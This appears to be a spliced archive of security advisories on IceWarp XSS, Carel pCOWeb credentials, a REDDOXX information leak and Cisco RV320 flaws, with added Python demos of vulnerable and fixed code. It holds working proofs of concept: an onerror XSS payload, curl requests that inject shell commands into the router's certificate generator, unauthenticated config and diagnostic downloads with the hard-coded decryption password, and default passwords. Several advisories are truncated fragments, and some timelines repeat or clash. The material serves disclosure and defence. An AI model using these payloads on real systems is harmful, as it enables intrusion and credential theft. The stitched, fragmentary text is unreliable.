Vendor URL: http://www.icewarp.com/
Vendor Status: patch available
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-016
Advisory Status: published
CVE: CVE-2019-19266
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19266

Introduction
============

"Secure professional email with own domain and revolutionary integration
with chat. Shared calendars for perfect planning."

(from the vendor's homepage)

More Details
============

Users can create, modify and share appointments in IceWarp with other users
of the web application. Especially noteworthy are the following two XML
elements in the request to create a new appointment (only the element
values are preserved in this copy):

text/html
<h1>RedTeam Pentesting</h1>

These define the content type and the body of a note for an appointment.
It was found that some HTML in notes is rendered, while certain elements
and attributes are filtered. However, the filter only takes effect when the
content type of the note is set to "text/html". When the content type is
left out or set to any other type, the filter is not active, enabling
attackers to circumvent the filter and execute JavaScript in the user's
browser. The same is true for notes attached to other objects, such as
files or tasks.
Just using the calendar module, at least three ways to attack other IceWarp
users are available using cross-site scripting in a note of an appointment:

* Inviting other attendees to an appointment
* Sharing access to an appointment
* Sending a calendar file as a request via email

Especially for the first variant, adding the attacked user to a manipulated
appointment, no user interaction is required from that user besides opening
the IceWarp calendar.

Proof of Concept
================

Create an appointment using an HTTP request similar to the following (the
XML element names of the request body are not preserved in this copy; the
values are listed in order):

POST /[...]/webmail/server/webmail.php HTTP/1.1
Host: icewarp.example.com
Content-Type: text/xml

Example Appointment
0
U
<img style="display: none;" src="x" onerror="alert('RedTeam Pentesting')">
0
Z
<_tzevnstartdate>2458801
<_tzevnenddate>2458801
<_tzevnstarttime>660
<_tzevnendtime>690
<_tzid>Europe/Amsterdam
60

The request declares no "text/html" content type for the note, so the HTML
filter is not applied to the img element and its onerror handler runs when
the note is displayed.

Workaround
==========

None known.

Fix
===

Update to IceWarp 12.2.1.1.

Security Risk
=============

Attackers with access to an IceWarp account can give other legitimate
IceWarp users access to manipulated objects. If the attacked user opens the
preview of such an object, for example by just opening the calendar, a
cross-site scripting vulnerability can be exploited. That could, for
example, be used to display a fake login form and obtain the user's
credentials, or to access any data stored in IceWarp such as emails,
contacts, tasks, files or appointments. While this requires an attacker
with access to an IceWarp account, such access could be gained by
exploiting the vulnerability described in rt-sa-2019-015 [1]. This is
considered to pose a high risk.
Timeline
========

2019-11-11 Vulnerability identified
2019-11-15 Vendor notified
2019-11-22 Customer approved disclosure
2019-11-25 CVE number requested
2019-11-25 CVE number assigned
2019-12-02 Vendor released fixed version
2019-12-10 Customer approved disclosure
2019-12-13 Fixed version released
2020-01-02 Advisory released

References
==========

[1] https://www.redteam-pentesting.de/advisories/rt-sa-2019-015
[FD] [RT-SA-2019-015] IceWarp: Cross-Site Scripting in Notes for Contacts
Advisory: IceWarp: Cross-Site Scripting in Notes for Contacts

During a penetration test, RedTeam Pentesting discovered that the IceWarp
WebMail Server is prone to user-assisted cross-site scripting attacks in
its contact module. If IceWarp users import a manipulated vcard, for
example from an email, attackers can run arbitrary JavaScript code in the
users' browsers.

Details
=======

Product: IceWarp WebMail Server
Affected Versions: IceWarp 12.2.0, 12.1.x, probably earlier as well
Fixed Versions: IceWarp 12.2.1.1
Vulnerability Type: Cross-Site Scripting
Security Risk: high
Vendor URL: http://www.icewarp.com/
Vendor Status: patch available
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-15
Advisory Status: published
CVE: CVE-2019-19265
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19265

Introduction
============

"Secure professional email with own domain and revolutionary integration
with chat. Shared calendars for perfect planning."

(from the vendor's homepage)

More Details
============

IceWarp allows users to import contacts in vcard format [1] from emails.
These contacts can contain HTML notes, as can be seen by exporting notes
created by IceWarp. The following line shows such a note:

X-ALT-NOTE;FMTTYPE=text/html:RedTeam Pentesting

By inserting JavaScript here, a cross-site scripting vulnerability can be
exploited if an IceWarp user imports such a manipulated contact into
IceWarp. The property handling for the HTML-formatted note ("X-ALT-NOTE"
with the "FMTTYPE" parameter) is not defined in the vcard standard [1], but
is borrowed from the calendar file format iCalendar [2]. The vcard standard
itself defines the property "NOTE", and this field can be used to exploit
the cross-site scripting vulnerability in IceWarp, too.
Proof of Concept
================

Send an IceWarp user one of the following vcards (the HTML payload in the
note property is not preserved in this copy):

BEGIN:VCARD
VERSION:4.0
FN:Pentesting\, RedTeam
N:Pentesting;RedTeam;;;
X-ALT-NOTE;FMTTYPE=text/html:
EMAIL;TYPE=INTERNET,PREF:testus...@example.com
END:VCARD

or

BEGIN:VCARD
VERSION:4.0
FN:Pentesting\, RedTeam
N:Pentesting;RedTeam;;;
NOTE:
EMAIL;TYPE=INTERNET,PREF:testus...@example.com
END:VCARD

Workaround
==========

None known.

Fix
===

Update to IceWarp 12.2.1.1.

Security Risk
=============

Attackers without an account on the IceWarp system can send specially
crafted vcard [1] files to IceWarp users. If an IceWarp user imports such a
contact into the IceWarp web application, a cross-site scripting
vulnerability can be exploited. That could, for example, be used to display
a fake login form and obtain the user's credentials, or to access any data
stored in IceWarp such as emails, contacts, tasks, files or appointments.
Such access could in turn be abused to exploit the vulnerability described
in rt-sa-2019-016 [3]. This is considered to pose a high risk.

Timeline
========

2019-11-11 Vulnerability identified
2019-11-15 Vendor notified
2019-11-22 Customer approved disclosure
2019-11-25 CVE number requested
2019-11-25 CVE number assigned
2019-12-02 Vendor released fixed version
2019-12-10 Customer approved disclosure
2019-12-13 Fixed version released
2020-01-02 Advisory released

References
==========

[1] https://tools.ietf.org/html/rfc6350
[2] https://tools.ietf.org/html/rfc2445
[3] https://www.redteam-pentesting.de/advisories/rt-sa-2019-16
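The two IceWarp advisories above (rt-sa-2019-015 and rt-sa-2019-016) describe the same flaw from two entry points: a note is only run through the HTML filter when its declared content type is "text/html", so a note without that type, or with any other type, reaches the browser unfiltered. The example below is added here and is not IceWarp code or code from the advisories. It extracts NOTE and X-ALT-NOTE properties from a vCard (covering the import path of rt-sa-2019-015), then renders them with a vulnerable renderer that reproduces the content-type-gated filter and with a hardened one that sanitises HTML and escapes every other type. The allowlist sanitiser, the tag set and the sample vCard with its probe payloads are constructed for this example and are not the payloads from the penetration test.

```python
"""Content-type-gated HTML filtering in notes, vulnerable and hardened."""
import html
from html.parser import HTMLParser

# Constructed vCard in the shape of the advisory's proof of concept.
SAMPLE_VCARD = """BEGIN:VCARD
VERSION:4.0
FN:Pentesting\\, RedTeam
N:Pentesting;RedTeam;;;
X-ALT-NOTE;FMTTYPE=text/html:<b>hello</b><img src=x onerror=alert(1)>
NOTE:<img src=x onerror=alert(2)>
EMAIL;TYPE=INTERNET,PREF:test@example.com
END:VCARD
"""

# Tags that may survive sanitisation; every attribute is dropped.
ALLOWED_TAGS = {"b", "i", "u", "em", "strong", "p", "br", "h1", "h2", "h3"}


def parse_vcard_notes(text):
    """Return [(fmttype, value)] for every NOTE and X-ALT-NOTE property.
    fmttype is None when the property carries no FMTTYPE parameter."""
    unfolded = []
    for raw in text.splitlines():
        # RFC 6350 line folding: a leading space or tab continues the line
        if raw[:1] in (" ", "\t") and unfolded:
            unfolded[-1] += raw[1:]
        else:
            unfolded.append(raw)
    notes = []
    for line in unfolded:
        if ":" not in line:
            continue
        head, value = line.split(":", 1)
        name, *params = head.split(";")
        if name.upper() not in ("NOTE", "X-ALT-NOTE"):
            continue
        fmttype = None
        for param in params:
            key, _, val = param.partition("=")
            if key.upper() == "FMTTYPE":
                fmttype = val.strip().lower()
        notes.append((fmttype, value))
    return notes


class _AllowlistSanitizer(HTMLParser):
    """Keeps ALLOWED_TAGS without any attributes (so no on* handlers, no src
    or href), escapes text, and drops everything else including comments."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag in ALLOWED_TAGS:
            self.out.append(f"<{tag}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(html.escape(data, quote=True))


def sanitize_html(fragment):
    parser = _AllowlistSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)


def render_note_vulnerable(fmttype, value):
    """Reproduces the flaw: the filter only runs for text/html; a missing or
    different type is emitted unchanged, and the browser still parses it."""
    if fmttype == "text/html":
        return sanitize_html(value)
    return value


def render_note_fixed(fmttype, value):
    """The declared type is attacker-controlled, so it only selects between
    two safe paths: sanitise as HTML, or escape so it renders as plain text."""
    if fmttype == "text/html":
        return sanitize_html(value)
    return html.escape(value, quote=True)


def render_all(text, renderer):
    return [renderer(fmttype, value) for fmttype, value in parse_vcard_notes(text)]
```

The point of the hardened renderer is that there is no branch in which untrusted bytes reach the page unmodified; whichever type the sender declares, the output is either allowlisted HTML or escaped text.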
[FD] [RT-SA-2019-014] Unauthenticated Access to Modbus Interface in Carel pCOWeb HVAC
2019-09-02 Vendor notified
2019-09-09 Vendor did not respond as promised
2019-09-17 Vendor could not be reached
2019-09-18 Vendor could not be reached
2019-10-28 Advisory published due to publication of CVE-2019-13549
[FD] [RT-SA-2019-013] Unsafe Storage of Credentials in Carel pCOWeb HVAC
sr/local/root/flash/etc/sysconfig/userspwd
PROOT=froot
PHTTP=fhttpadmin
PGUEST=fguest
PCAREL=fcarel

Workaround
==========

Change all default passwords listed above and ensure the user "nobody" is
disabled or has a password set. The Carel pCOWeb card should not be
connected to networks accessible by untrusted users (compare advisory
rt-sa-2019-014 [1]).

Fix
===

No updated firmware will be published for pCOWeb cards, as they have been
obsolete since December 2017. Successor hardware with current firmware is
available for OEM integrators.

Security Risk
=============

Attackers with knowledge of one set of user credentials for a Carel pCOWeb
card could use the password hashes readable by all users in "/etc/passwd",
or the plaintext copies of the passwords, to gain different privileges. Due
to the necessity of access to credentials, this is considered to pose a low
risk only.

Timeline
========

2019-07-17 Vulnerability identified
2019-08-03 Customer approved disclosure to vendor
2019-09-02 Vendor notified
2019-09-09 Vendor did not respond as promised
2019-09-17 Vendor could not be reached
2019-09-18 Vendor could not be reached
2019-09-18 Vendor could not be reached
2019-10-28 Advisory published due to publication of CVE-2019-13553

References
==========

[0] https://www.carel.com/documents/10191/0/+030220471/9619472f-f1c0-4ec9-a151-120aaa5e479a?version=1.0
[1] https://www.redteam-pentesting.de/de/advisories/rt-sa-2019-014.txt
[FD] [RT-SA-2019-012] Information Disclosure in REDDOXX Appliance
---

It provides details about the used license (serial number replaced by a
random value for demonstration purposes):

{
  "version": "1.1",
  "id": "{----}",
  "result": {
    "License": {
      "Activated": true,
      "ActivationDate": "2000-01-01T12:34:56",
      "ApplianceID": "1234",
      "ArchiveLicenses": "1",
      "Cluster": false,
      "Customer": "Example Ltd.",
      "HasFullMaildepotLicense": true,
      "HasFullSpamfinderLicense": true,
      "HasMaildepotPremiumLicense": true,
      "MailDepotImporterLicense": false,
      "MailSealerLicenses": "1",
      "MailSealerSignatureLicense": false,
      "MsxAgentLicenses": "1",
      "SerialNumber": "AIP1-EECA-EUKI-E6AH-OOGH-EI5Y",
      "ServiceDate": "1899-12-30T00:00:00",
      "SpamfinderLicenses": "1",
      "SubscriptionDate": "2020-01-30T12:34:56",
      "Valid": true,
      "VirusScan": true
    }
  }
}

Workaround
==========

None

Fix
===

Install the latest hotfixes for the appliance, see [2].

Security Risk
=============

The risk of the information disclosure through the two API calls is
estimated to be low. Although the API calls should not be available without
authentication, "CoreService.GetRealmList" only returns rudimentary
information about the authentication realms, and "CoreService.GetLicense"
is mostly a problem for the vendor, as the serial number could be misused
to set up a licensed application without paying.

Timeline
========

2019-05-21 Vulnerability identified
2019-05-24 Customer approved disclosure to vendor
2019-06-04 Vendor notified
2019-06-05 Vendor acknowledges the vulnerability
2019-06-17 Vendor released hotfix
2019-06-24 Customer approved release
2019-07-01 Advisory released

References
==========

[0] https://www.reddoxx.com/en/
[1] https://my.reddoxx.com/documents/manual/en/custdl/product-downloads (requires login)
[2] https://appliance.docs.reddoxx.com/de/release-notes/release-notes-version-2032-service-pack-2-2-2-1242
[FD] [RT-SA-2019-002] Directory Traversal in Cisco Expressway Gateway
closure for May 1st to RedTeam Pentesting
2019-05-01 Vendor publishes advisory
2019-05-16 Customer approves release of this advisory
2019-05-17 Advisory released
[FD] [RT-SA-2019-005] Cisco RV320 Command Injection
Advisory: Cisco RV320 Command Injection

RedTeam Pentesting discovered a command injection vulnerability in the
web-based certificate generator feature of the Cisco RV320 router which was
inadequately patched by the vendor.

Details
=======

Product: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others
Affected Versions: 1.4.2.15 through 1.4.2.20
Fixed Versions: none
Vulnerability Type: Remote Code Execution
Security Risk: medium
Vendor URL: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject
Vendor Status: working on patch
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-005
Advisory Status: published
CVE: CVE-2019-1652
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1652

Introduction
============

"Keep your employees, your business, and yourself productive and
effective. The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal choice
for any small office or small business looking for performance, security,
and reliability in its network."

(from the Cisco RV320 product page [1])

More Details
============

The router's web interface enables users to generate new X.509
certificates directly on the device. Previously, RedTeam Pentesting
identified a vulnerability (rt-sa-2018-004) [2] in this component: by
providing a specially crafted common name, it was possible to inject shell
commands which were subsequently executed on the router as the root user.
This vulnerability was addressed in firmware version 1.4.2.19 published by
Cisco [3].

RedTeam Pentesting discovered that the certificate generator in the patched
firmware is still vulnerable. The update adds several filters to handle
single quotes in user input. However, these filters can be evaded by
specially crafted inputs. By providing the following string for the
certificate's common name, a "ping" command can be injected:

'a$(ping -c 4 192.168.1.2)'b

Proof of Concept
================

The following HTTP POST request invokes the certificate generator function
and triggers the command injection. It requires a valid session cookie for
the device's web interface. The user agent "curl" is blacklisted by the
firmware and must be changed in the HTTP client (here with -A kurl):

$ curl -s -k -A kurl -X POST -b "$COOKIE" \
  --data "page=self_generator.htm&totalRules=1&OpenVPNRules=30"\
"&submitStatus=1&log_ch=1&type=4&Country=A&state=A&locality=A"\
"&organization=A&organization_unit=A&email=ab%40example.com"\
"&KeySize=512&KeyLength=1024&valid_days=30&SelectSubject_c=1&"\
"SelectSubject_s=1" \
  --data-urlencode "common_name='a\$(ping -c 4 192.168.1.2)'b" \
  "https://192.168.1.1/certificate_handle2.htm?type=4"

Afterwards, the incoming ICMP echo requests can be observed on the
attacker's system at 192.168.1.2.

Workaround
==========

Prevent untrusted users from using the router's web interface.

Fix
===

None

Security Risk
=============

The vulnerability allows attackers with administrative access to the
router's web interface to execute arbitrary operating system commands on
the device. Because attackers require valid credentials for the web
interface, this vulnerability is only rated as a medium risk.
Timeline
========

2018-09-19 Original vulnerability identified
2018-09-27 Customer approved disclosure to vendor
2018-09-28 Vendor notified
2018-10-05 Receipt of advisory acknowledged by vendor
2018-10-05 Notified vendor of disclosure date: 2019-01-09
2018-12-21 Postponing disclosure to 2019-01-23, as requested by vendor
2019-01-16 List of affected versions provided by vendor
2019-01-22 Firmware 1.4.2.20 released by vendor
2019-01-23 Advisory (rt-sa-2018-004) published
2019-02-07 Incomplete mitigation of vulnerability identified
2019-02-08 Proof of concept sent to vendor
2019-02-08 Receipt of proof of concept acknowledged by vendor
2019-02-15 Full advisory sent to vendor
2019-02-15 Notified vendor of disclosure date: 2019-03-27
2019-03-25 Requested progress update from vendor
2019-03-25 Vendor requests postponed disclosure
2019-03-25 Postponement declined
2019-03-27 Advisory published

References
==========

[1] https://www.cisco.com/c/en/us/products/routers/rv320-dual-gigabit-wan-vpn-router/index.html
[2] https://www.redteam-pentesting.de/advisories/rt-sa-2018-004
[3] https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject
[FD] [RT-SA-2019-004] Cisco RV320 Unauthenticated Diagnostic Data Retrieval
[FD] [RT-SA-2019-003] Cisco RV320 Unauthenticated Configuration Export
Advisory: Cisco RV320 Unauthenticated Configuration Export

RedTeam Pentesting discovered that the configuration of a Cisco RV320
router can still be exported without authentication via the device's web
interface due to an inadequate fix by the vendor.

Details
=======

Product: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others
Affected Versions: 1.4.2.15 through 1.4.2.20
Fixed Versions: none
Vulnerability Type: Information Disclosure
Security Risk: high
Vendor URL: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info
Vendor Status: working on patch
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-003
Advisory Status: published
CVE: CVE-2019-1653
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1653

Introduction
============

"Keep your employees, your business, and yourself productive and
effective. The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal choice
for any small office or small business looking for performance, security,
and reliability in its network."

(from the Cisco RV320 product page [1])

More Details
============

The Cisco RV320 Dual Gigabit WAN VPN Router provides a web-based
configuration interface, which is implemented in various CGI programs in
the device's firmware. Access to this web interface requires prior
authentication using a username and password. Previously, RedTeam
Pentesting identified a vulnerability (rt-sa-2018-002) [2] in the CGI
program:

/cgi-bin/config.exp

By issuing an HTTP GET request to this program, it was possible to export a
router's configuration without providing any prior authentication. This
vulnerability was addressed in firmware version 1.4.2.19 published by
Cisco [3].

RedTeam Pentesting discovered that the CGI program in the patched firmware
is still vulnerable. By performing a specially crafted HTTP POST request,
attackers are still able to download the router's configuration. The user
agent "curl" is blacklisted by the firmware and must be changed in the HTTP
client. Again, exploitation does not require any authentication.

Proof of Concept
================

A device's configuration can be retrieved by issuing an HTTP POST request
to the vulnerable CGI program (output shortened):

$ curl -s -k -A kurl -X POST --data 'submitbkconfig=0' \
  'https://192.168.1.1/cgi-bin/config.exp'
sysconfig
[VERSION]
VERSION=73
MODEL=RV320
SSL=0
IPSEC=0
PPTP=0
PLATFORMCODE=RV0XX
[...]
[SYSTEM]
HOSTNAME=router
DOMAINNAME=example.com
DOMAINCHANGE=1
USERNAME=cisco
PASSWD=066bae9070a9a95b3e03019db131cd40
[...]

Workaround
==========

Prevent untrusted clients from connecting to the device's web server.

Fix
===

None

Security Risk
=============

This vulnerability is rated as a high risk as it exposes the device's
configuration to untrusted, potentially malicious parties. By downloading
the configuration, attackers can obtain the internal network configuration,
VPN or IPsec secrets, as well as password hashes for the router's user
accounts. Knowledge of a user's password hash is sufficient to log into the
router's web interface; cracking the hash is not required. Any information
obtained through exploitation of this vulnerability can be used to
facilitate further compromise of the device itself or attached networks.
Timeline
========

2018-09-19 Original vulnerability identified
2018-09-27 Customer approved disclosure to vendor
2018-09-28 Vendor notified
2018-10-05 Receipt of advisory acknowledged by vendor
2018-10-05 Notified vendor of disclosure date: 2019-01-09
2018-11-18 List of affected versions provided by vendor
2018-12-21 Postponing disclosure to 2019-01-23, as requested by vendor
2019-01-22 Firmware 1.4.2.20 released by vendor
2019-01-23 Advisory (rt-sa-2018-002) published
2019-02-07 Incomplete mitigation of vulnerability identified
2019-02-08 Proof of concept sent to vendor
2019-02-08 Receipt of proof of concept acknowledged by vendor
2019-02-15 Full advisory sent to vendor
2019-02-15 Notified vendor of disclosure date: 2019-03-27
2019-03-25 Requested progress update from vendor
2019-03-25 Vendor requests postponed disclosure
2019-03-25 Postponement declined
2019-03-27 Advisory published

References
==========

[1] https://www.cisco.com/c/en/us/products/routers/rv320-dual-gigabit-wan-vpn-router/index.html
[2] https://www.redteam-pentesting.de/advisories/rt-sa-2018-002
[3] https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info
[FD] [RT-SA-2019-007] Code Execution via Insecure Shell Function getopt_simple
responded, document is not updated/maintained any more
2019-03-20 CVE ID requested
2019-03-21 CVE ID assigned
2019-03-26 Advisory released
[FD] [RT-SA-2018-004] Cisco RV320 Command Injection
Advisory: Cisco RV320 Command Injection

RedTeam Pentesting discovered a command injection vulnerability in the web-based certificate generator feature of the Cisco RV320 router.

Details
=======

Product: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others
Affected Versions: 1.4.2.15 and later
Fixed Versions: since 1.4.2.20
Vulnerability Type: Remote Code Execution
Security Risk: medium
Vendor URL: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2018-004
Advisory Status: published
CVE: CVE-2019-1652
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1652

Introduction
============

"Keep your employees, your business, and yourself productive and effective. The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal choice for any small office or small business looking for performance, security, and reliability in its network."
(from the Cisco RV320 product page [1])

More Details
============

The router's web interface enables users to generate new X.509 certificates directly on the device. A user may enter the typical configuration parameters required for a certificate, such as the organisation, the common name and so on. In order to generate the certificate, the device uses the command-line program openssl [2]. The device's firmware uses the following format string to assemble the openssl command:

openssl req -new -nodes -subj '/C=%s/ST=%s/L=%s/O=%s/OU=%s/CN=%s/emailAddress=%s' -keyout %s%s.key -sha256 -out %s%s.csr -days %s -newkey rsa:%s > /dev/null 2>&1

Although the web interface filters certain special characters via JavaScript, there is no input filtering, escaping or encoding happening on the server. This allows attackers to inject arbitrary commands.
Proof of Concept
================

Even though all components of the subject seem to be vulnerable to command injection, the following example uses the common name to trigger a ping command:

a'$(ping -c 4 192.168.1.2)'b

The first single quote in this value terminates the single-quoted -subj argument of the format string shown above, so the shell evaluates the $(...) command substitution before openssl is ever invoked; the trailing quote re-opens the literal so that the remainder of the command stays syntactically valid.

The following HTTP POST request invokes the certificate generator function and triggers the command injection. It requires a valid session cookie for the device's web interface.

curl -s -b "$COOKIE" \
  --data "page=self_generator.htm&totalRules=1&OpenVPNRules=30"\
"&submitStatus=1&log_ch=1&type=4&Country=A&state=A&locality=A"\
"&organization=A&organization_unit=A&email=ab%40example.com"\
"&KeySize=512&KeyLength=1024&valid_days=30&SelectSubject_c=1&"\
"SelectSubject_s=1" \
  --data-urlencode "common_name=a'\$(ping -c 4 192.168.1.2)'b" \
  "http://192.168.1.1/certificate_handle2.htm?type=4"

Afterwards, the incoming ICMP echo requests can be observed on the attacker's system at 192.168.1.2.

Workaround
==========

Prevent untrusted users from using the router's web interface.

Fix
===

Install firmware version 1.4.2.20 (or later) on the router.

Security Risk
=============

The vulnerability allows attackers with administrative access to the router's web interface to execute arbitrary operating system commands on the device. Because attackers require valid credentials for the web interface, this vulnerability is only rated as a medium risk.
Timeline
========

2018-09-19 Vulnerability identified
2018-09-27 Customer approved disclosure to vendor
2018-09-28 Vendor notified
2018-10-05 Receipt of advisory acknowledged by vendor
2018-10-05 Notified vendor of disclosure date: 2019-01-09
2018-12-21 Postponing disclosure to 2019-01-23, as requested by vendor
2019-01-16 List of affected versions provided by vendor
2019-01-23 Advisory published

References
==========

[1] https://www.cisco.com/c/en/us/products/routers/rv320-dual-gigabit-wan-vpn-router/index.html
[2] https://wiki.openssl.org/index.php/Command_Line_Utilities
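The quoting flaw behind this advisory, reproduced as an added example that is not the router's firmware code: the firmware's format string places each subject field inside a single-quoted -subj literal and hands the whole line to a shell. The example below keeps exactly that quoting structure but substitutes printf for openssl, so the only effect of the injected $(...) is an INJECTED marker in the output, and sets it beside the argv-based construction (no shell at all) and a shlex.quote fallback that keep the common name as data. The field values, the PAYLOAD and the allow-list regex are constructed for the demo.

```python
"""Command injection through a single-quoted format string, and two fixes.
Added example; not the RV320 firmware's code. printf stands in for openssl."""
import re
import shlex
import subprocess

SUBJ = "/C=%s/ST=%s/L=%s/O=%s/OU=%s/CN=%s/emailAddress=%s"

# Same single-quoted structure as the firmware's openssl command line, with
# printf in place of openssl so running it only echoes the assembled subject.
VULN_TEMPLATE = "printf '%%s\\n' '" + SUBJ + "'"

# Harmless stand-in for the advisory's ping payload (constructed for the demo).
PAYLOAD = "a'$(echo INJECTED)'b"
FIELDS = ["A", "A", "A", "A", "A", PAYLOAD, "ab@example.com"]


def vulnerable_build(fields):
    """Assemble the command line the way the firmware does: sprintf into a
    single-quoted literal. A quote inside a field breaks out of the literal."""
    return VULN_TEMPLATE % tuple(fields)


def vulnerable_run(fields):
    """Hand the assembled string to /bin/sh, as the firmware effectively does.
    The $(...) in the common name is evaluated by the shell before printf runs."""
    proc = subprocess.run(["sh", "-c", vulnerable_build(fields)],
                          capture_output=True, text=True, check=True)
    return proc.stdout


def safe_run(fields):
    """Fix 1: pass the subject as one argv element and never start a shell.
    Quotes and $(...) are then ordinary characters in the -subj value."""
    proc = subprocess.run(["printf", "%s\n", SUBJ % tuple(fields)],
                          capture_output=True, text=True, check=True)
    return proc.stdout


def quoted_run(fields):
    """Fix 2: if a shell string is unavoidable, quote the whole argument.
    shlex.quote wraps it in single quotes and rewrites embedded ones as '"'"'."""
    cmd = "printf '%%s\\n' %s" % shlex.quote(SUBJ % tuple(fields))
    proc = subprocess.run(["sh", "-c", cmd], capture_output=True, text=True, check=True)
    return proc.stdout


def valid_subject_field(value):
    """Defence in depth: server-side allow-list for X.509 subject components
    (constructed for the demo; the firmware performs no server-side check)."""
    return re.fullmatch(r"[A-Za-z0-9 .,@_-]{1,64}", value) is not None


if __name__ == "__main__":
    print("vulnerable:", vulnerable_run(FIELDS), end="")
    print("argv      :", safe_run(FIELDS), end="")
    print("quoted    :", quoted_run(FIELDS), end="")
    print("allowed?  :", valid_subject_field(PAYLOAD))
```

In the vulnerable run the subject comes back as `.../CN=aINJECTEDb/...`, proving the substitution ran inside the shell; both fixed variants print the payload verbatim, and the allow-list rejects it before any command is built.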
[FD] [RT-SA-2018-003] Cisco RV320 Unauthenticated Diagnostic Data Retrieval
Advisory: Cisco RV320 Unauthenticated Diagnostic Data Retrieval

RedTeam Pentesting discovered that the Cisco RV320 router exposes sensitive diagnostic data without authentication through the device's web interface.

Details
=======

Product: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others
Affected Versions: 1.4.2.15, 1.4.2.17
Fixed Versions: since 1.4.2.19
Vulnerability Type: Information Disclosure
Security Risk: high
Vendor URL: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2018-003
Advisory Status: published
CVE: CVE-2019-1653
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1653

Introduction
============

"Keep your employees, your business, and yourself productive and effective. The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal choice for any small office or small business looking for performance, security, and reliability in its network."
(from the Cisco RV320 product page [1])

More Details
============

The Cisco RV320 Dual Gigabit WAN VPN Router provides a web-based configuration interface. In the device's firmware, this functionality is implemented using a variety of CGI programs. Access to this web interface requires prior authentication using a username and password. RedTeam Pentesting discovered the CGI program:

/cgi-bin/export_debug_msg.exp

This program can be used to retrieve various diagnostic information from the device, which includes its current configuration. In contrast to other functions, this CGI program does not require any form of authentication. It may be accessed through the router's web server, which is available from the LAN by default. As described in [2], firmware versions from 1.4.2 to 1.4.2.15 (inclusive) also expose the web server to the WAN on TCP port 8007.

Proof of Concept
================

The diagnostic data can be retrieved by issuing an HTTP POST request to the vulnerable CGI program.
OpenSSL is used to decrypt the data with the hard-coded password "NKDebug12#$%" before unpacking it with tar (output shortened):

$ curl --data submitdebugmsg=1 \
    'http://192.168.1.1/cgi-bin/export_debug_msg.exp' > debug
$ openssl aes-128-cbc -salt -md md5 -d \
    -k 'NKDebug12#$%' < debug > debug.tgz
$ mkdir output && tar -xf debug.tgz -C output/
$ ls -1 output/
debug_messages.txt
etc.tgz
nk_sysconfig
var.tgz
$ cat output/nk_sysconfig
sysconfig
[VERSION]
VERSION=73
MODEL=RV320
SSL=0
IPSEC=0
PPTP=0
PLATFORMCODE=RV0XX
[...]
[SYSTEM]
HOSTNAME=router
DOMAINNAME=example.com
DOMAINCHANGE=1
USERNAME=cisco
PASSWD=066bae9070a9a95b3e03019db131cd40
[...]

Workaround
==========

Prevent untrusted clients from connecting to the device's web server.

Fix
===

Install firmware version 1.4.2.19 (or later) on the router.

Security Risk
=============

This vulnerability is rated as a high risk as it exposes sensitive diagnostic information, such as the device's configuration, to untrusted, potentially malicious parties. By retrieving this information, attackers can obtain the internal network configuration, VPN or IPsec secrets, as well as password hashes for the router's user accounts. Knowledge of a user's password hash is sufficient to log into the router's web interface. Any information obtained through exploitation of this vulnerability can be used to facilitate further compromise of the device itself or attached networks.
Timeline
========

2018-09-19 Vulnerability identified
2018-09-27 Customer approved disclosure to vendor
2018-09-28 Vendor notified
2018-10-05 Receipt of advisory acknowledged by vendor
2018-10-05 Notified vendor of disclosure date: 2019-01-09
2018-11-18 List of affected versions provided by vendor
2018-12-21 Postponing disclosure to 2019-01-23, as requested by vendor
2019-01-23 Advisory published

References
==========

[1] https://www.cisco.com/c/en/us/products/routers/rv320-dual-gigabit-wan-vpn-router/index.html
[2] https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvg42801
[FD] [RT-SA-2018-002] Cisco RV320 Unauthenticated Configuration Export
Advisory: Cisco RV320 Unauthenticated Configuration Export

RedTeam Pentesting discovered that the configuration of a Cisco RV320 router may be exported without authentication through the device's web interface.

Details
=======

Product: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others
Affected Versions: 1.4.2.15, 1.4.2.17
Fixed Versions: since 1.4.2.19
Vulnerability Type: Information Disclosure
Security Risk: high
Vendor URL: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2018-002
Advisory Status: published
CVE: CVE-2019-1653
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1653

Introduction
============

